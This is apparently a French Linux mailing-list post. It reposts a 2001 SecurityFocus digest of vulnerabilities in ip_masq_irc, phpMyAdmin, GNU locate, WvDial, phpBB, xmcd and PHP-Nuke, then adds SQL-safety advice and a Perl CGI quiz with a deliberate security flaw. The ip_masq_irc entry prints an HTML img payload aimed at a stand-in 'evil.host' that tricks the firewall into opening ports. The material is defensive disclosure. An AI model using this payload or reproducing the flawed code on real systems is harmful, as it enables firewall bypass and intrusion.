Linux IRC IP Masquerading Module Arbitrary Firewall Rule Insertion Vulnerability BugTraq ID: 3117 Remote: Yes Date Published: 2001-07-30 Relevant URL: http://www.securityfocus.com/bid/3117 Summary: The Linux 'ip_masq_irc' IP masquerading module is used to inspect IRC protocol data and interpret DCC file transfer requests. The module dynamically opens and maps ports for IRC data transfers. The module contains a vulnerability that may allow a remote attacker to insert malicious rules into the firewall. When a 'DCC SEND' request is sent from a host behind the firewall and the request contains an IP address differing from that host, the ip_masq_irc module opens a port to allow the specified remote host to make a connection for a data transfer. Because the module processes any data on port 6667, it may be possible for an attacker to use a client based program to exploit the problem. For instance, a HTML <img> tag could be sent in an e-mail or on a web page to a user behind the target network: <img src="ftp://evil.host:6667/%01DCC%20SEND%20file%20addr%20port";> or using another similar pattern, depending on how the module is configured. The module may interpret the request as a DCC file transfer request and temporary allow a connection to the given port and address through the firewall. This could allow an attacker to create a condition where a connection can be established to any host and port behind the firewall, bypassing the filtering rules. phpMyAdmin Arbitrary Command Execution Vulnerability BugTraq ID: 3121 Remote: Yes Date Published: 2001-07-31 Relevant URL: http://www.securityfocus.com/bid/3121 Summary: phpMyAdmin is a freely available tool that provides a WWW interface for handling MySQL adminstrative tasks. An input validation error exists in phpMyAdmin that could allow remote users to cause arbitrary commands to be executed by the PHP interpreter at runtime. The problem is the result of how some variables are handled in the 'tbl_copy.php' and 'tbl_rename.php' scripts. It is possible to submit values for certain variables internal to the scripts. Under certain circumstances, the variables are evaluated with the eval() command, making it possible for an attacker to submit the commands he or she wishes to have executed as the value of that variable. No authentication mechanisms are enabled with default installations of phpMyAdmin. GNU Locate Arbitrary Command Execution Vulnerability BugTraq ID: 3127 Remote: No Date Published: 2001-08-01 Relevant URL: http://www.securityfocus.com/bid/3127 Summary: GNU locate is an application that searches file databases for file names that match user-supplied patterns. The program supports searching through filename databases composed in two different formats: an old format produced by Unix versions of locate and find, and a new format used in versions 4.0 and greater of GNU locate. A boundary condition error can occur when the program reads old-format database files. Each individual database entry begins with a one byte offset-differential count, indicating the number of characters of prefix of the preceding entry to use beyond the number that the preceding entry is using as its predecessor. Byte values 0 through 28 indicate offset-differential counts from -14 through 14. If the offset-differential count is larger than can be stored in a byte, the byte has the value 30 and the count follows in a machine-size word. The problem exists because the machine-size word following a byte value of 30 is treated as a signed integer. By inserting an entry into the database with a negative value as the offset-differential count, it is possible to cause the program to write data read from the file to an arbitrary locations in process memory. If an attacker is able to write a malicious entry to a database file used by other users, the attacker could cause arbitrary code to be executed by another user when the user runs the locate program. It also should be noted that in earlier versions of Slackware(circa 3.5) the file is written by the superuser. WvDial Insecure Default Permissions Vulnerability BugTraq ID: 3128 Remote: No Date Published: 2001-08-01 Relevant URL: http://www.securityfocus.com/bid/3128 Summary: WvDial is a Linux-based dialer, intended to allow dialup network functionality. When WvDial is compiled and installed it creates a configuration file('wvdial.conf'). Sensitive information may be stored in this file, such as usernames/passwords for dialup services. The problem is that this file is created, by default, with world-readable permissions. It should be noted that WvDial does not automatically store dialup account information. Additionally, users have the option of using a pre-existing configuration file. Due to insecure default permissions, any local user on the host is privy to the information in this file. It has been reported that this default configuration may not be present in all systems using WvDial (such as RedHat). PHPBB Remote SQL Query Manipulation Vulnerability BugTraq ID: 3142 Remote: Yes Date Published: 2001-08-03 Relevant URL: http://www.securityfocus.com/bid/3142 Summary: phpBB is free, open-source, easy-to-use web forums software. An issue exists in phpBB which allows a remote attacker to manipulate SQL queries in such a way as to gain an administrative account with the service. PHP normally strips backslashes from HTTP requests. However, 'auth.php' contains an algorithm with overrides this feature. The result is that input passed to certain variables via phpBB may be able reach SQL queries. One such variable is 'viewemail'. This issue can be exploited by making a cleverly crafted web request that contains arbitrary user-supplied replacement values. One consequence of successful exploitation is that the attacker will be privy to user information. XMCD Temp Directory Symbolic Link Vulnerability BugTraq ID: 3148 Remote: No Date Published: 2001-08-03 Relevant URL: http://www.securityfocus.com/bid/3148 Summary: xmcd is a freely available cd playing utility for the various UNIX platforms. It is maintained by public domain. A problem in the cda utility included with the package can allow a user to overwrite files, potentially creating a denial of service. When executed, cda creates temporary files insecurely. It is possible for a user to predict the name of a future temporary file, and create a symbolic link pointing to another file to be overwritten. Once executed, cda attempts to create and write to the temporary file, overwriting the file that has been symbolically linked. cda is installed setuid root, which makes it possible for a user exploiting this vulnerability to overwrite any root owned file. Exploitation of this vulnerability could result in a denial of service, and potentially an elevation of privileges. PHP-Nuke Remote SQL Query Manipulation Vulnerability BugTraq ID: 3149 Remote: Yes Date Published: 2001-08-03 Relevant URL: http://www.securityfocus.com/bid/3149 Summary: PHP-Nuke is a website creation/maintainence tool written in PHP3. PHP-Nuke reportedly contains a vulnerability introduced in a new feature which may permit remote attackers to execute almost arbitrary SQL queries. In version 5.x of PHP-Nuke, the administrator can set an arbitrary prefix for the database table names. Because it is a prefix for PHP-Nuke tables, this variable is included in many SQL queries used by PHP-Nuke. If remote clients can submit their own value for 'prefix', they can alter SQL query strings so that almost arbitrary database operations are performed. By default, most PHP-Nuke scripts include a PHP file called 'mainfile.php' containing library code and constants for use throughout the application. 'prefix' is defined in this file, and scripts that include 'mainfile.php' cannot be exploited by remote attackers as the 'prefix' value defined in 'mainfile.php' will override a remotely supplied value. In some scripts, attackers may be able to cause 'mainfile.php' to not be included, making it possible to supply an arbitrary 'prefix' value. The file, 'article.php', is reportedly such a script. If the 'mainfile' variable is passed to the script remotely, 'mainfile.php' will not be included by 'article.php'. Once the file is not included in a PHP script, the attacker may supply an arbitrary 'prefix' value. The 'prefix' value is used in the following manner: UPDATE $prefix"._stories." SET.. A remote attacker can supply a value for prefix that can assume control over the query after the 'UPDATE' statement. In this example, an attacker can cause an arbitrary table to be updated in any way permitted by database access controls. Attackers may, for example, be able to 'UPDATE' all of the administrators passwords to values known by the attacker. She could then proceed to log into PHP-Nuke as an administrator. This may permit remote attackers to delete or corrupt data, elevate PHP-Nuke privileges or even possibly gain local access to the database server. by Nathan Neulinger, [EMAIL PROTECTED] Relevant URL: http://www.securityfocus.com/tools/2132 Platforms: UNIX CGIWrap is a gateway program that allows general users to use CGI scripts and HTML forms without compromising the security of the http server. Scripts are run with the permissions of the user who owns the script. In addition, several security checks are performed on the script, which will not be executed if any checks fail. [ le traitement de texte sur des requêtes SQL est à faire avec beaucoup de précaution: certains langages comme Perl permettent à la place de faire du `binding' de certains types de données: on écrit alors SELECT * FROM table WHERE (a = ?) et on passe en paramètre une ou plusieurs variables qui sont encapsulées par le module Perl concerné. Dans ce cas, même ce qui précède ne fonctionne pas: on ne peut utiliser cette fonctionnalité DBI Perl pour les noms de table p.ex. Donc s'assurer p.ex. que la variable contient /^[a-z0-9_]+$/ avant de faire le traitement de texte. ] Ah, et pour voir si vous avez lu jusque là, le code Perl suivant a un problème grave de sécurité. Réponses à [EMAIL PROTECTED] (attention au Reply-To:), le premier gagne un pin's Linux (si j'arrive à le retrouver). #! /usr/bin/perl -w use strict; use CGI; my $query = new CGI; # L'idée est que toutes les opérations sont ouvertes à tous, mais # les droits sont augmentés lorsque la personne connaît le mot de # passe d'administration. my $is_admin = 0; if (defined($query->param('admin_password')) && &is_valid_admin_password($query->param('admin_password'))) { $is_admin = 1; } if (defined($query->param('operation')) && &is_valid_operation($query->param('operation'))) { # Cette fonction n'est pas définie, mais elle exécute l'opération # précisée, éventuellement avec les droits administrateurs. &do_operation($query->param('operation'), $is_admin); } exit 0; sub is_valid_admin_password { my ($password) = @_; # Ceci n'est pas beau, mais n'est pas le problème de sécurité qui # nous intéresse. return $password eq 'turlututu'; } sub is_valid_operation { my ($operation) = @_; my %valid_operations = ('lire' => undef, 'ecrire' => undef, 'modifier' => undef); return exists $valid_operations{$operation}; } NB: c'est du pseudo-code, il faudra peut-être un peu le tripatouiller pour qu'il fonctionne. - Pour poster une annonce: [EMAIL PROTECTED]
